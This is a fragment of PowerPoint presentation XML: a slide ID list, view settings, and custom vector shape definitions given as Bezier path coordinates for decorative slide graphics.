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63" r:id="rId4"/>
    <p:sldId id="264" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="267" r:id="rId8"/>
    <p:sldId id="269" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="274" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="276" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="279" r:id="rId20"/>
    <p:sldId id="280" r:id="rId21"/>
    <p:sldId id="282" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="262" r:id="rId24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589"/>
    <a:srgbClr val="FFD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7" autoAdjust="0"/>
    <p:restoredTop sz="94027" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="106" d="100"/>
          <a:sy n="106" d="100"/>
        </p:scale>
        <p:origin x="61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26EF6-600D-4A30-ADF6-3C724CB45E3B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0B769-EA29-45FE-903B-CF2C69C1A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564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3984816-17E8-4804-BD73-DA063AE4C85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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C1247A-E364-4EC7-8FB0-FB41E02D4C18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3403600" y="1225550"/>
            <a:ext cx="4783138" cy="4745038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1670 w 2447"/>
              <a:gd name="T1" fmla="*/ 936 h 2431"/>
              <a:gd name="T2" fmla="*/ 1589 w 2447"/>
              <a:gd name="T3" fmla="*/ 956 h 2431"/>
              <a:gd name="T4" fmla="*/ 1552 w 2447"/>
              <a:gd name="T5" fmla="*/ 929 h 2431"/>
              <a:gd name="T6" fmla="*/ 1551 w 2447"/>
              <a:gd name="T7" fmla="*/ 928 h 2431"/>
              <a:gd name="T8" fmla="*/ 1423 w 2447"/>
              <a:gd name="T9" fmla="*/ 928 h 2431"/>
              <a:gd name="T10" fmla="*/ 1311 w 2447"/>
              <a:gd name="T11" fmla="*/ 1040 h 2431"/>
              <a:gd name="T12" fmla="*/ 1184 w 2447"/>
              <a:gd name="T13" fmla="*/ 1040 h 2431"/>
              <a:gd name="T14" fmla="*/ 1184 w 2447"/>
              <a:gd name="T15" fmla="*/ 912 h 2431"/>
              <a:gd name="T16" fmla="*/ 1551 w 2447"/>
              <a:gd name="T17" fmla="*/ 546 h 2431"/>
              <a:gd name="T18" fmla="*/ 1555 w 2447"/>
              <a:gd name="T19" fmla="*/ 423 h 2431"/>
              <a:gd name="T20" fmla="*/ 1555 w 2447"/>
              <a:gd name="T21" fmla="*/ 423 h 2431"/>
              <a:gd name="T22" fmla="*/ 1524 w 2447"/>
              <a:gd name="T23" fmla="*/ 380 h 2431"/>
              <a:gd name="T24" fmla="*/ 1543 w 2447"/>
              <a:gd name="T25" fmla="*/ 298 h 2431"/>
              <a:gd name="T26" fmla="*/ 1678 w 2447"/>
              <a:gd name="T27" fmla="*/ 163 h 2431"/>
              <a:gd name="T28" fmla="*/ 1678 w 2447"/>
              <a:gd name="T29" fmla="*/ 35 h 2431"/>
              <a:gd name="T30" fmla="*/ 1551 w 2447"/>
              <a:gd name="T31" fmla="*/ 35 h 2431"/>
              <a:gd name="T32" fmla="*/ 1463 w 2447"/>
              <a:gd name="T33" fmla="*/ 123 h 2431"/>
              <a:gd name="T34" fmla="*/ 1381 w 2447"/>
              <a:gd name="T35" fmla="*/ 143 h 2431"/>
              <a:gd name="T36" fmla="*/ 1348 w 2447"/>
              <a:gd name="T37" fmla="*/ 120 h 2431"/>
              <a:gd name="T38" fmla="*/ 1343 w 2447"/>
              <a:gd name="T39" fmla="*/ 115 h 2431"/>
              <a:gd name="T40" fmla="*/ 1216 w 2447"/>
              <a:gd name="T41" fmla="*/ 115 h 2431"/>
              <a:gd name="T42" fmla="*/ 35 w 2447"/>
              <a:gd name="T43" fmla="*/ 1295 h 2431"/>
              <a:gd name="T44" fmla="*/ 35 w 2447"/>
              <a:gd name="T45" fmla="*/ 1423 h 2431"/>
              <a:gd name="T46" fmla="*/ 163 w 2447"/>
              <a:gd name="T47" fmla="*/ 1423 h 2431"/>
              <a:gd name="T48" fmla="*/ 267 w 2447"/>
              <a:gd name="T49" fmla="*/ 1319 h 2431"/>
              <a:gd name="T50" fmla="*/ 394 w 2447"/>
              <a:gd name="T51" fmla="*/ 1319 h 2431"/>
              <a:gd name="T52" fmla="*/ 394 w 2447"/>
              <a:gd name="T53" fmla="*/ 1447 h 2431"/>
              <a:gd name="T54" fmla="*/ 179 w 2447"/>
              <a:gd name="T55" fmla="*/ 1662 h 2431"/>
              <a:gd name="T56" fmla="*/ 179 w 2447"/>
              <a:gd name="T57" fmla="*/ 1790 h 2431"/>
              <a:gd name="T58" fmla="*/ 306 w 2447"/>
              <a:gd name="T59" fmla="*/ 1790 h 2431"/>
              <a:gd name="T60" fmla="*/ 498 w 2447"/>
              <a:gd name="T61" fmla="*/ 1598 h 2431"/>
              <a:gd name="T62" fmla="*/ 625 w 2447"/>
              <a:gd name="T63" fmla="*/ 1598 h 2431"/>
              <a:gd name="T64" fmla="*/ 625 w 2447"/>
              <a:gd name="T65" fmla="*/ 1726 h 2431"/>
              <a:gd name="T66" fmla="*/ 179 w 2447"/>
              <a:gd name="T67" fmla="*/ 2173 h 2431"/>
              <a:gd name="T68" fmla="*/ 179 w 2447"/>
              <a:gd name="T69" fmla="*/ 2300 h 2431"/>
              <a:gd name="T70" fmla="*/ 306 w 2447"/>
              <a:gd name="T71" fmla="*/ 2300 h 2431"/>
              <a:gd name="T72" fmla="*/ 673 w 2447"/>
              <a:gd name="T73" fmla="*/ 1933 h 2431"/>
              <a:gd name="T74" fmla="*/ 801 w 2447"/>
              <a:gd name="T75" fmla="*/ 1933 h 2431"/>
              <a:gd name="T76" fmla="*/ 801 w 2447"/>
              <a:gd name="T77" fmla="*/ 2061 h 2431"/>
              <a:gd name="T78" fmla="*/ 815 w 2447"/>
              <a:gd name="T79" fmla="*/ 2047 h 2431"/>
              <a:gd name="T80" fmla="*/ 815 w 2447"/>
              <a:gd name="T81" fmla="*/ 2174 h 2431"/>
              <a:gd name="T82" fmla="*/ 943 w 2447"/>
              <a:gd name="T83" fmla="*/ 2174 h 2431"/>
              <a:gd name="T84" fmla="*/ 968 w 2447"/>
              <a:gd name="T85" fmla="*/ 2149 h 2431"/>
              <a:gd name="T86" fmla="*/ 1096 w 2447"/>
              <a:gd name="T87" fmla="*/ 2149 h 2431"/>
              <a:gd name="T88" fmla="*/ 1096 w 2447"/>
              <a:gd name="T89" fmla="*/ 2276 h 2431"/>
              <a:gd name="T90" fmla="*/ 1104 w 2447"/>
              <a:gd name="T91" fmla="*/ 2268 h 2431"/>
              <a:gd name="T92" fmla="*/ 1104 w 2447"/>
              <a:gd name="T93" fmla="*/ 2396 h 2431"/>
              <a:gd name="T94" fmla="*/ 1232 w 2447"/>
              <a:gd name="T95" fmla="*/ 2396 h 2431"/>
              <a:gd name="T96" fmla="*/ 2412 w 2447"/>
              <a:gd name="T97" fmla="*/ 1216 h 2431"/>
              <a:gd name="T98" fmla="*/ 2412 w 2447"/>
              <a:gd name="T99" fmla="*/ 1088 h 2431"/>
              <a:gd name="T100" fmla="*/ 2285 w 2447"/>
              <a:gd name="T101" fmla="*/ 1088 h 2431"/>
              <a:gd name="T102" fmla="*/ 2253 w 2447"/>
              <a:gd name="T103" fmla="*/ 1120 h 2431"/>
              <a:gd name="T104" fmla="*/ 2125 w 2447"/>
              <a:gd name="T105" fmla="*/ 1120 h 2431"/>
              <a:gd name="T106" fmla="*/ 2125 w 2447"/>
              <a:gd name="T107" fmla="*/ 992 h 2431"/>
              <a:gd name="T108" fmla="*/ 2334 w 2447"/>
              <a:gd name="T109" fmla="*/ 783 h 2431"/>
              <a:gd name="T110" fmla="*/ 2334 w 2447"/>
              <a:gd name="T111" fmla="*/ 655 h 2431"/>
              <a:gd name="T112" fmla="*/ 2207 w 2447"/>
              <a:gd name="T113" fmla="*/ 655 h 2431"/>
              <a:gd name="T114" fmla="*/ 2196 w 2447"/>
              <a:gd name="T115" fmla="*/ 666 h 2431"/>
              <a:gd name="T116" fmla="*/ 2124 w 2447"/>
              <a:gd name="T117" fmla="*/ 678 h 2431"/>
              <a:gd name="T118" fmla="*/ 2088 w 2447"/>
              <a:gd name="T119" fmla="*/ 653 h 2431"/>
              <a:gd name="T120" fmla="*/ 2085 w 2447"/>
              <a:gd name="T121" fmla="*/ 649 h 2431"/>
              <a:gd name="T122" fmla="*/ 1957 w 2447"/>
              <a:gd name="T123" fmla="*/ 649 h 2431"/>
              <a:gd name="T124" fmla="*/ 1670 w 2447"/>
              <a:gd name="T125" fmla="*/ 936 h 2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7" h="2431">
                <a:moveTo>
                  <a:pt x="1670" y="936"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1635" y="969"/>
                  <a:pt x="1604" y="963"/>
                  <a:pt x="1589" y="956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1570" y="947"/>
                  <a:pt x="1565" y="941"/>
                  <a:pt x="1552" y="929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1551" y="929"/>
                  <a:pt x="1551" y="929"/>
                  <a:pt x="1551" y="928"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1515" y="893"/>
                  <a:pt x="1458" y="893"/>
                  <a:pt x="1423" y="928"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1311" y="1040"/>
                  <a:pt x="1311" y="1040"/>
                  <a:pt x="1311" y="1040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1276" y="1075"/>
                  <a:pt x="1219" y="1075"/>
                  <a:pt x="1184" y="1040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1149" y="1005"/>
                  <a:pt x="1149" y="948"/>
                  <a:pt x="1184" y="912"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1551" y="546"/>
                  <a:pt x="1551" y="546"/>
                  <a:pt x="1551" y="546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1584" y="512"/>
                  <a:pt x="1586" y="458"/>
                  <a:pt x="1555" y="423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1555" y="423"/>
                  <a:pt x="1555" y="423"/>
                  <a:pt x="1555" y="423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1539" y="405"/>
                  <a:pt x="1533" y="401"/>
                  <a:pt x="1524" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1517" y="364"/>
                  <a:pt x="1510" y="333"/>
                  <a:pt x="1543" y="298"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1678" y="163"/>
                  <a:pt x="1678" y="163"/>
                  <a:pt x="1678" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1714" y="127"/>
                  <a:pt x="1714" y="70"/>
                  <a:pt x="1678" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1643" y="0"/>
                  <a:pt x="1586" y="0"/>
                  <a:pt x="1551" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1463" y="123"/>
                  <a:pt x="1463" y="123"/>
                  <a:pt x="1463" y="123"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1427" y="156"/>
                  <a:pt x="1396" y="149"/>
                  <a:pt x="1381" y="143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1364" y="135"/>
                  <a:pt x="1358" y="130"/>
                  <a:pt x="1348" y="120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1347" y="118"/>
                  <a:pt x="1345" y="117"/>
                  <a:pt x="1343" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1308" y="80"/>
                  <a:pt x="1251" y="80"/>
                  <a:pt x="1216" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="1295"/>
                  <a:pt x="35" y="1295"/>
                  <a:pt x="35" y="1295"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1331"/>
                  <a:pt x="0" y="1388"/>
                  <a:pt x="35" y="1423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="1458"/>
                  <a:pt x="128" y="1458"/>
                  <a:pt x="163" y="1423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="267" y="1319"/>
                  <a:pt x="267" y="1319"/>
                  <a:pt x="267" y="1319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="302" y="1284"/>
                  <a:pt x="359" y="1284"/>
                  <a:pt x="394" y="1319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="429" y="1354"/>
                  <a:pt x="429" y="1412"/>
                  <a:pt x="394" y="1447"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="1662"/>
                  <a:pt x="179" y="1662"/>
                  <a:pt x="179" y="1662"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="1697"/>
                  <a:pt x="144" y="1755"/>
                  <a:pt x="179" y="1790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="1825"/>
                  <a:pt x="271" y="1825"/>
                  <a:pt x="306" y="1790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="498" y="1598"/>
                  <a:pt x="498" y="1598"/>
                  <a:pt x="498" y="1598"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="533" y="1563"/>
                  <a:pt x="590" y="1563"/>
                  <a:pt x="625" y="1598"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="661" y="1634"/>
                  <a:pt x="661" y="1691"/>
                  <a:pt x="625" y="1726"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="2173"/>
                  <a:pt x="179" y="2173"/>
                  <a:pt x="179" y="2173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="2208"/>
                  <a:pt x="144" y="2265"/>
                  <a:pt x="179" y="2300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="2336"/>
                  <a:pt x="271" y="2336"/>
                  <a:pt x="306" y="2300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="673" y="1933"/>
                  <a:pt x="673" y="1933"/>
                  <a:pt x="673" y="1933"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="709" y="1898"/>
                  <a:pt x="766" y="1898"/>
                  <a:pt x="801" y="1933"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="836" y="1969"/>
                  <a:pt x="836" y="2026"/>
                  <a:pt x="801" y="2061"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="815" y="2047"/>
                  <a:pt x="815" y="2047"/>
                  <a:pt x="815" y="2047"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="780" y="2082"/>
                  <a:pt x="780" y="2139"/>
                  <a:pt x="815" y="2174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="850" y="2210"/>
                  <a:pt x="907" y="2210"/>
                  <a:pt x="943" y="2174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="968" y="2149"/>
                  <a:pt x="968" y="2149"/>
                  <a:pt x="968" y="2149"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1004" y="2113"/>
                  <a:pt x="1061" y="2113"/>
                  <a:pt x="1096" y="2149"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1131" y="2184"/>
                  <a:pt x="1131" y="2241"/>
                  <a:pt x="1096" y="2276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1104" y="2268"/>
                  <a:pt x="1104" y="2268"/>
                  <a:pt x="1104" y="2268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1069" y="2304"/>
                  <a:pt x="1069" y="2361"/>
                  <a:pt x="1104" y="2396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1139" y="2431"/>
                  <a:pt x="1196" y="2431"/>
                  <a:pt x="1232" y="2396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2412" y="1216"/>
                  <a:pt x="2412" y="1216"/>
                  <a:pt x="2412" y="1216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2447" y="1180"/>
                  <a:pt x="2447" y="1123"/>
                  <a:pt x="2412" y="1088"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2377" y="1053"/>
                  <a:pt x="2320" y="1053"/>
                  <a:pt x="2285" y="1088"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2253" y="1120"/>
                  <a:pt x="2253" y="1120"/>
                  <a:pt x="2253" y="1120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2217" y="1155"/>
                  <a:pt x="2160" y="1155"/>
                  <a:pt x="2125" y="1120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2090" y="1085"/>
                  <a:pt x="2090" y="1027"/>
                  <a:pt x="2125" y="992"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2334" y="783"/>
                  <a:pt x="2334" y="783"/>
                  <a:pt x="2334" y="783"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2369" y="748"/>
                  <a:pt x="2369" y="691"/>
                  <a:pt x="2334" y="655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2299" y="620"/>
                  <a:pt x="2242" y="620"/>
                  <a:pt x="2207" y="655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2196" y="666"/>
                  <a:pt x="2196" y="666"/>
                  <a:pt x="2196" y="666"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2165" y="690"/>
                  <a:pt x="2138" y="684"/>
                  <a:pt x="2124" y="678"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2106" y="669"/>
                  <a:pt x="2100" y="664"/>
                  <a:pt x="2088" y="653"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2087" y="651"/>
                  <a:pt x="2086" y="650"/>
                  <a:pt x="2085" y="649"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2050" y="614"/>
                  <a:pt x="1993" y="614"/>
                  <a:pt x="1957" y="649"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1670" y="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3EC03C70-F70E-4D97-86EC-1F02519F7D3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75722" y="1947863"/>
            <a:ext cx="8808806" cy="28575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21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88ADCC0A-75EF-4963-A396-C8DEFC1397B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8924925" y="1189038"/>
            <a:ext cx="654050" cy="654050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 328 w 335"/>
              <a:gd name="T1" fmla="*/ 56 h 335"/>
              <a:gd name="T2" fmla="*/ 299 w 335"/>
              <a:gd name="T3" fmla="*/ 57 h 335"/>
              <a:gd name="T4" fmla="*/ 274 w 335"/>
              <a:gd name="T5" fmla="*/ 57 h 335"/>
              <a:gd name="T6" fmla="*/ 274 w 335"/>
              <a:gd name="T7" fmla="*/ 82 h 335"/>
              <a:gd name="T8" fmla="*/ 273 w 335"/>
              <a:gd name="T9" fmla="*/ 110 h 335"/>
              <a:gd name="T10" fmla="*/ 245 w 335"/>
              <a:gd name="T11" fmla="*/ 111 h 335"/>
              <a:gd name="T12" fmla="*/ 220 w 335"/>
              <a:gd name="T13" fmla="*/ 111 h 335"/>
              <a:gd name="T14" fmla="*/ 220 w 335"/>
              <a:gd name="T15" fmla="*/ 136 h 335"/>
              <a:gd name="T16" fmla="*/ 219 w 335"/>
              <a:gd name="T17" fmla="*/ 165 h 335"/>
              <a:gd name="T18" fmla="*/ 190 w 335"/>
              <a:gd name="T19" fmla="*/ 166 h 335"/>
              <a:gd name="T20" fmla="*/ 166 w 335"/>
              <a:gd name="T21" fmla="*/ 166 h 335"/>
              <a:gd name="T22" fmla="*/ 166 w 335"/>
              <a:gd name="T23" fmla="*/ 190 h 335"/>
              <a:gd name="T24" fmla="*/ 165 w 335"/>
              <a:gd name="T25" fmla="*/ 219 h 335"/>
              <a:gd name="T26" fmla="*/ 136 w 335"/>
              <a:gd name="T27" fmla="*/ 220 h 335"/>
              <a:gd name="T28" fmla="*/ 111 w 335"/>
              <a:gd name="T29" fmla="*/ 220 h 335"/>
              <a:gd name="T30" fmla="*/ 111 w 335"/>
              <a:gd name="T31" fmla="*/ 245 h 335"/>
              <a:gd name="T32" fmla="*/ 110 w 335"/>
              <a:gd name="T33" fmla="*/ 273 h 335"/>
              <a:gd name="T34" fmla="*/ 82 w 335"/>
              <a:gd name="T35" fmla="*/ 274 h 335"/>
              <a:gd name="T36" fmla="*/ 57 w 335"/>
              <a:gd name="T37" fmla="*/ 274 h 335"/>
              <a:gd name="T38" fmla="*/ 57 w 335"/>
              <a:gd name="T39" fmla="*/ 299 h 335"/>
              <a:gd name="T40" fmla="*/ 56 w 335"/>
              <a:gd name="T41" fmla="*/ 328 h 335"/>
              <a:gd name="T42" fmla="*/ 27 w 335"/>
              <a:gd name="T43" fmla="*/ 329 h 335"/>
              <a:gd name="T44" fmla="*/ 3 w 335"/>
              <a:gd name="T45" fmla="*/ 329 h 335"/>
              <a:gd name="T46" fmla="*/ 0 w 335"/>
              <a:gd name="T47" fmla="*/ 326 h 335"/>
              <a:gd name="T48" fmla="*/ 28 w 335"/>
              <a:gd name="T49" fmla="*/ 325 h 335"/>
              <a:gd name="T50" fmla="*/ 53 w 335"/>
              <a:gd name="T51" fmla="*/ 325 h 335"/>
              <a:gd name="T52" fmla="*/ 53 w 335"/>
              <a:gd name="T53" fmla="*/ 300 h 335"/>
              <a:gd name="T54" fmla="*/ 54 w 335"/>
              <a:gd name="T55" fmla="*/ 272 h 335"/>
              <a:gd name="T56" fmla="*/ 83 w 335"/>
              <a:gd name="T57" fmla="*/ 271 h 335"/>
              <a:gd name="T58" fmla="*/ 107 w 335"/>
              <a:gd name="T59" fmla="*/ 271 h 335"/>
              <a:gd name="T60" fmla="*/ 108 w 335"/>
              <a:gd name="T61" fmla="*/ 246 h 335"/>
              <a:gd name="T62" fmla="*/ 109 w 335"/>
              <a:gd name="T63" fmla="*/ 217 h 335"/>
              <a:gd name="T64" fmla="*/ 137 w 335"/>
              <a:gd name="T65" fmla="*/ 216 h 335"/>
              <a:gd name="T66" fmla="*/ 162 w 335"/>
              <a:gd name="T67" fmla="*/ 216 h 335"/>
              <a:gd name="T68" fmla="*/ 162 w 335"/>
              <a:gd name="T69" fmla="*/ 192 h 335"/>
              <a:gd name="T70" fmla="*/ 163 w 335"/>
              <a:gd name="T71" fmla="*/ 163 h 335"/>
              <a:gd name="T72" fmla="*/ 192 w 335"/>
              <a:gd name="T73" fmla="*/ 162 h 335"/>
              <a:gd name="T74" fmla="*/ 216 w 335"/>
              <a:gd name="T75" fmla="*/ 162 h 335"/>
              <a:gd name="T76" fmla="*/ 216 w 335"/>
              <a:gd name="T77" fmla="*/ 137 h 335"/>
              <a:gd name="T78" fmla="*/ 217 w 335"/>
              <a:gd name="T79" fmla="*/ 109 h 335"/>
              <a:gd name="T80" fmla="*/ 246 w 335"/>
              <a:gd name="T81" fmla="*/ 107 h 335"/>
              <a:gd name="T82" fmla="*/ 271 w 335"/>
              <a:gd name="T83" fmla="*/ 107 h 335"/>
              <a:gd name="T84" fmla="*/ 271 w 335"/>
              <a:gd name="T85" fmla="*/ 83 h 335"/>
              <a:gd name="T86" fmla="*/ 272 w 335"/>
              <a:gd name="T87" fmla="*/ 54 h 335"/>
              <a:gd name="T88" fmla="*/ 300 w 335"/>
              <a:gd name="T89" fmla="*/ 53 h 335"/>
              <a:gd name="T90" fmla="*/ 325 w 335"/>
              <a:gd name="T91" fmla="*/ 53 h 335"/>
              <a:gd name="T92" fmla="*/ 325 w 335"/>
              <a:gd name="T93" fmla="*/ 28 h 335"/>
              <a:gd name="T94" fmla="*/ 326 w 335"/>
              <a:gd name="T95" fmla="*/ 0 h 335"/>
              <a:gd name="T96" fmla="*/ 329 w 335"/>
              <a:gd name="T97" fmla="*/ 3 h 335"/>
              <a:gd name="T98" fmla="*/ 329 w 335"/>
              <a:gd name="T99" fmla="*/ 27 h 335"/>
              <a:gd name="T100" fmla="*/ 328 w 335"/>
              <a:gd name="T101" fmla="*/ 56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5" h="335">
                <a:moveTo>
                  <a:pt x="328" y="56"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="320" y="63"/>
                  <a:pt x="309" y="60"/>
                  <a:pt x="299" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="290" y="54"/>
                  <a:pt x="280" y="51"/>
                  <a:pt x="274" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="269" y="63"/>
                  <a:pt x="271" y="72"/>
                  <a:pt x="274" y="82"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="278" y="92"/>
                  <a:pt x="281" y="103"/>
                  <a:pt x="273" y="110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="118"/>
                  <a:pt x="255" y="114"/>
                  <a:pt x="245" y="111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="235" y="108"/>
                  <a:pt x="226" y="105"/>
                  <a:pt x="220" y="111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="117"/>
                  <a:pt x="217" y="126"/>
                  <a:pt x="220" y="136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="223" y="146"/>
                  <a:pt x="227" y="157"/>
                  <a:pt x="219" y="165"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="211" y="172"/>
                  <a:pt x="201" y="169"/>
                  <a:pt x="190" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="181" y="163"/>
                  <a:pt x="172" y="160"/>
                  <a:pt x="166" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="172"/>
                  <a:pt x="163" y="181"/>
                  <a:pt x="166" y="190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="201"/>
                  <a:pt x="172" y="211"/>
                  <a:pt x="165" y="219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="227"/>
                  <a:pt x="146" y="223"/>
                  <a:pt x="136" y="220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="217"/>
                  <a:pt x="117" y="214"/>
                  <a:pt x="111" y="220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="226"/>
                  <a:pt x="108" y="235"/>
                  <a:pt x="111" y="245"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="255"/>
                  <a:pt x="118" y="266"/>
                  <a:pt x="110" y="273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103" y="281"/>
                  <a:pt x="92" y="278"/>
                  <a:pt x="82" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="271"/>
                  <a:pt x="63" y="268"/>
                  <a:pt x="57" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="280"/>
                  <a:pt x="54" y="289"/>
                  <a:pt x="57" y="299"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="309"/>
                  <a:pt x="64" y="320"/>
                  <a:pt x="56" y="328"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="335"/>
                  <a:pt x="38" y="332"/>
                  <a:pt x="27" y="329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="326"/>
                  <a:pt x="9" y="323"/>
                  <a:pt x="3" y="329"/>
                </a:cubicBezTo>
